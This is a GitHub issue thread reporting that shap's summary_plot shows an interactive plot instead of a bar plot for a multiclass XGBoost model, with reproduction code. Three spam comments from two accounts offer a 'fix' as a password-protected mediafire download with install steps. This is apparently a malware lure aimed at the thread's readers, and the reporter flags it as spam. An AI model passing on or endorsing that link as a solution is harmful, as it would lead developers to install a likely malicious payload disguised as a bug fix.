### ISSUE TITLE
BUG: Wrong figure in shap.summary_plot for Multiclass.

### ISSUE THREAD

**Issue by 46319943** [shap/shap#3835]
### Issue Description

When the output is multiclass, the figure of the shap.summary_plot is wrong.
The expected plot should be bar plot, while the interactive plot is shown.
![Wrong plot image](https://github.com/user-attachments/assets/7ceb2aed-e9bf-4183-aae8-ec655dd9406b)

### Minimal Reproducible Example

```python
import numpy as np
import xgboost as xgb
import shap

print(f"SHAP version: {shap.__version__}")

n_samples = 100
n_features = 5
n_classes = 3

X = np.random.randn(n_samples, n_features)
y = np.random.randint(0, n_classes, n_samples)

model = xgb.XGBClassifier(n_estimators=10,)
model.fit(X, y)

explainer = shap.TreeExplainer(model)
explanation = explainer(X)

print(f"SHAP values shape: {explanation.shape}")

shap.summary_plot(explanation, X, plot_type="bar")
```

### Expected Behavior

Bar plot should be shown.

### Bug report checklist

- [X] I have checked that this issue has not already been reported.
- [X] I have confirmed this bug exists on the [latest release](https://github.com/shap/shap/releases) of shap.
- [X] I have confirmed this bug exists on the [master branch](https://github.com/shap/shap/blob/master/CONTRIBUTING.md#installing-from-the-master-branch) of shap.
- [X] I'd be interested in making a PR to fix this bug

### Installed Versions

SHAP version: 0.46.1.dev53

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by 46319943** [comment]
The two comments above are spam. Does anyone know how to delete or report them?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by thatlittleboy** [comment]
Tangentially related to issue #3630 .

**Comment by 46319943** [comment]
> Tangentially related to issue #3630 .

Oh! I just realized there are already existing issues related to this problem. I missed them when searching on Google, but they do appear when searching for 'multiclass' in the GitHub issues.

Thank you for pointing that out.
